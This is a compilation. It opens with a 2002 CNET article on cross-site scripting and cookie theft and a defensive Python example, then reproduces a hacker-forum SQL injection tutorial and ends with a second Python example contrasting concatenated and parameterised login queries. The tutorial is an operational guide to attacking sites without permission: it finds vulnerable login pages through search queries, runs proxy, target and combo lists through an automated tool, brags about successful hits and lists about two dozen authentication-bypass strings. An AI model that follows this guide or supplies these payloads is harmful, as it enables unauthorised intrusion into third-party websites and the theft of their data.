Here's one more trick up hackers' sleeves

Even if hackers can't hijack your computer, they can still gain access to your personal info--and your Web e-mail--through something called cross-site scripting. Robert tells you the best way to protect yourself.

By Robert Vamosi Senior associate editor, CNET Reviews (7/25/02)
In the early days of the Internet, Web pages were flat. Now, they are dynamic, often created on the fly and customized to incorporate your preferences. For example, Travelocity offers information about travel to and from destinations you choose each time you visit the site. The advantages of dynamic pages are many: content is fresher, easier to maintain, and easier to navigate. Unfortunately, some dynamic Web sites also expose you to cross-site scripting (XSS), a method of capturing personal information that's becoming increasingly popular with malicious users. While buffer overflows offer malicious users a way to take control of your computer, XSS rarely causes your system to be hijacked. Rather, XSS is an indirect way for a malicious attacker to fool you into revealing personal information or to exploit a secondary vulnerability on your desktop browser or within a Web site's server. XSS allows malicious users to hijack your Web-based e-mail accounts, manipulate your customer settings on a site, or steal information sent in cookies, which may include your bank account, credit card, or social security number.

Let's look at cookie theft, since cookies are so widely used. Cookies are small packets of information shared between your desktop (the client) and a Web site (the server).

Cookies are not necessarily dangerous. They allow sites such as Amazon to recognize you when you visit the site and offer personalized recommendations for products you may want to buy. By storing your password and ID, cookies allow you to automatically log on to your online bank or stock-trading site. Cookies are site-specific; for example, BigStore.com can't access your cookies from LittleStore.com, nor can a malicious user view all the cookies stored on your desktop. Cookies for financial sites tend to be encrypted, while those for e-commerce sites tend not to be.

For an attacker, the trick is to redirect your personal information to a third-party site that he or she can access. One popular method is to use malicious links. Often, these are sent in e-mail messages. They may appear to be legitimate URLs, but on closer examination, you can see that they include malicious Web addresses. Also, a malicious URL could be coded in HEX, so http:// would become 0x0068, 0x0074, 0x0074, 0x0070, 0x003A, 0x002F, 0x002F. Many of us--if we ever really look at the contents of a URL--tend to stop at the http://, believing that any string of information following must be legit. Malicious users also trick us by hiding URLs in Web pages so that they look like standard hotlinks--until you click the link or view the page's source code.

For example, the URL would look like the address for search-engine results, but it's a fake that the malicious user can access. Your browser (and your cookie info) is then sent to a third-party site that looks just like the legitimate one. Since your browser might recognize the spoofed site as a trusted site--it thinks it's the same as the legit site--the malicious user could, with a well-crafted script, run potentially damaging code on your computer.

Another way attackers gain access to your personal information is to create a popup asking you to reenter your username and password after you've already logged on to a legitimate Web site. The information might not be going to the source you intended.

Most attack methods these days require malicious users to be sitting at a terminal, waiting for you to open yourself up to harm, as opposed to a virus writer, who lets loose his or her virus and then sits back and waits days or weeks for the damage to be done. David Endler of iDefense Labs, however, thinks this won't always be the case. In a recent white paper, Endler says future XSS exploits could easily be automated. Indeed, a malicious user could set up a script that would send him or her e-mail whenever you access your Web-based e-mail account.

So what can you do to protect yourself? You can turn off your browser's JavaScript, but that will restrict the number of sites you can visit. If you use Microsoft's Internet Explorer, you should set your security levels to High. You also can monitor all your cookie transactions, accepting or denying them individually. But all of these will inconvenience you and may not even prevent an attack. The good news is that the problem was much worse two or three years ago, when e-commerce sites were going online overnight, with little regard for customer security. What is needed is more protection on the sites themselves, as well as better programming and application security on the server side. My advice: be careful where you click, and to whom you give your username or password. Be wary of clicking URLs from people or sites you do not know or trust.
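The server-side protection the article calls for, shown as an added example that is not part of the CNET article: a "search results" page that reflects the query from the link, first unescaped (the cookie-theft path described above) and then escaped, plus a session cookie flagged HttpOnly so that script injected into the page cannot read it. The host bigstore.example, the q parameter and the malicious link are constructed for the example.

```python
# Added example (not from the CNET article): a minimal server-side template
# for a search-results page, in the vulnerable form the article warns about
# and in a hardened form.  All request data below is constructed.
import html
from urllib.parse import parse_qs, urlsplit


def render_results_vulnerable(query: str) -> str:
    """Reflect the search term into HTML unescaped: a script in the query
    runs in the site's own origin, where it can read document.cookie."""
    return f"<h1>Results for: {query}</h1>"


def render_results_safe(query: str) -> str:
    """Escape every reflected value: the browser shows the text verbatim
    instead of executing it."""
    return f"<h1>Results for: {html.escape(query, quote=True)}</h1>"


def session_cookie_header(session_id: str) -> str:
    """Set-Cookie with HttpOnly (script cannot read it even if XSS slips
    through), Secure (never sent in the clear) and SameSite (not attached
    to cross-site requests that start from a link in an e-mail)."""
    return (f"Set-Cookie: session={session_id}; HttpOnly; Secure; "
            "SameSite=Lax; Path=/")


def query_from_link(url: str) -> str:
    """Pull the q parameter out of a link the way the server would,
    percent-decoding it in the process."""
    params = parse_qs(urlsplit(url).query)
    return params.get("q", [""])[0]


# Constructed link of the kind the article says arrives by e-mail: a glance
# stops at "http://bigstore.example/search" and the percent-encoded tail
# hides a script tag.
MALICIOUS_LINK = ("http://bigstore.example/search?q="
                  "%3Cscript%3Ealert%28%27xss%27%29%3C%2Fscript%3E")

if __name__ == "__main__":
    q = query_from_link(MALICIOUS_LINK)
    print(render_results_vulnerable(q))   # the script tag reaches the page
    print(render_results_safe(q))         # rendered as harmless text
    print(session_cookie_header("constructed-session-id"))
```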

SQL injection Basic Tutorial

One of the major problems with SQL is its poor security; the issues surround the login and URL strings. This tutorial is not going to go into detail on why these strings work, as I'm not a coder; I just know what I know, and it works. If you are interested in this topic we have many articles related to SQL Injection; also, if you would like help with the topic, you can ask in our information security forum, where thousands of members can help you: http://governmentsecurity.org

WHAT I DO: first let me go into details on how I go about my research. I have gathered plenty of injection strings for quite some time, like these below, and have just been granted access to a test machine and will be testing for many variations and new inputs, provided by my good friend Gsecur aka ICE, also an Astal member. "Thanks mate." Legally cool; it gives me a chance to concentrate on what I'm doing and not be looking over my shoulder.

INJECTION STRINGS: HOW? This is the easiest part. Very simple: on the login page just enter something like user: admin (you don't even have to put this) pass: ' or 1=1-- or user: ' or 1=1-- admin: ' or 1=1-- Some sites will have just a password, so password: ' or 1=1-- In fact I have compiled a combo list with strings like this to use on my chosen targets. It doesn't have to be admin; it can be anything you want. The most important part is, for example: ' or 1=1-- This is our injection string. Now the only trudge part is finding targets to exploit, so I tend to search, say, Google for login.asp or whatever: inurl:login.asp, index of:/admin/login.asp, like this: index of login.asp result: http://www3.google.com/search?hl=en&ie=ISO...G=Google+Search string?? There are plenty of strings about. SEARCH: admin\login.asp login.asp With these two search strings you will have plenty of targets to choose from; finding one that's vulnerable is another question. The list below is a sample of the most commonly used; there are many other strings involving, for instance, UNION table access via reading the error pages' table structure, thus an attack with this method will eventually reveal admin U\P paths, but that's another paper. The one I'm interested in is quick access to targets.

PROGRAM: I tried several programs to use with these search strings and up to now only Ares has performed well, with quite a bit of success with a combo list formatted this way. Yesterday I loaded 40 eastern targets with 18 positive hits in a few minutes; how long would it take to go through 40 sites cutting and pasting each combo? Example: admin:' or a=a-- admin:' or 1=1-- and so on. Now I don't want to go into problems with users using Ares; thing is, I know it works for me. Now, using proxies set in my browser, I then click through interesting targets, seeing what's what on the site pages; if interesting, I then cut and paste the URL as a possible target. After an hour or so you have a list of sites of potential targets like so: http://www.somesite.com/login.asp http://www.another.com/admin/login.asp and so on. In a couple of hours you can build up quite a list. The reason I don't select all results or spider for login pages is I want to keep the noise level low (my ISP), plus atm I'm on dial-up, so too slow for me. I then save the list, fire up Ares and enter (1) a proxy list, (2) my target IP list, (3) my combo list; start, sit back and wait. Any target vulnerable will show up in the hits box. Now when it finds a target it will spew all the strings on that site as vulnerable; you have to go through each one on the site by cutting and pasting the string till you find the right one, but the thing is you know you CAN access the site. Really I need a program that will return the hit with a click on the URL and ignore false outputs; I'm still looking. Thing is, it saves quite a bit of time going to each site and each string to find it's not exploitable. 17,000 possible targets; trying various searches spews out plenty more. There you go, you should have access to your vulnerable target by now. Another thing: you can use the strings in the URLs where user=? Edit the URL to the = part and paste ' or 1=1-- so it becomes user=' or 1=1-- Just as quick as the login process.

(Variations)
admin'--
' or 0=0 --
" or 0=0 --
or 0=0 --
' or 0=0 #
" or 0=0 #
or 0=0 #
' or 'x'='x
" or "x"="x
') or ('x'='x
' or 1=1--
" or 1=1--
or 1=1--
' or a=a--
" or "a"="a
') or ('a'='a
") or ("a"="a
hi" or "a"="a
hi" or 1=1 --
hi' or 1=1 --
hi' or 'a'='a
hi') or ('a'='a
hi") or ("a"="a

Well, enough said. Happy hunting.
ComSec aka ZSL
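Why the login string in the post above works, and what stops it, as an added example that is not part of the tutorial: a login query built by string concatenation beside one that binds the inputs as parameters, both run against a constructed in-memory SQLite table. The users table, the account, the stored password and the sample inputs are all constructed for the example.

```python
# Added example (not from the tutorial above): the same login check written
# two ways, so the effect of "' or 1=1--" can be seen directly.
import sqlite3


def setup_db() -> sqlite3.Connection:
    """Constructed users table with one account (plaintext password only to
    keep the demo short; a real system stores a salted hash)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
    conn.execute("INSERT INTO users VALUES ('admin', 'correct horse battery')")
    return conn


def login_vulnerable(conn: sqlite3.Connection, username: str, password: str):
    """Builds the query by concatenation.  The quote in the input closes the
    string literal, "or 1=1" makes the WHERE clause true for every row and
    "--" comments out whatever follows, so any username is returned."""
    sql = ("SELECT username FROM users WHERE username = '" + username
           + "' AND password = '" + password + "'")
    row = conn.execute(sql).fetchone()
    return row[0] if row else None


def login_safe(conn: sqlite3.Connection, username: str, password: str):
    """Binds the inputs as parameters.  The driver passes them as data, never
    as SQL text, so the same string is simply compared against the stored
    password and fails to match."""
    sql = "SELECT username FROM users WHERE username = ? AND password = ?"
    row = conn.execute(sql, (username, password)).fetchone()
    return row[0] if row else None


# The injection string quoted in the post, as a constructed sample input.
INJECTION = "' or 1=1--"

if __name__ == "__main__":
    conn = setup_db()
    print(login_vulnerable(conn, "admin", INJECTION))            # admin
    print(login_vulnerable(conn, INJECTION, "anything"))         # admin
    print(login_safe(conn, "admin", INJECTION))                  # None
    print(login_safe(conn, "admin", "correct horse battery"))    # admin
```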
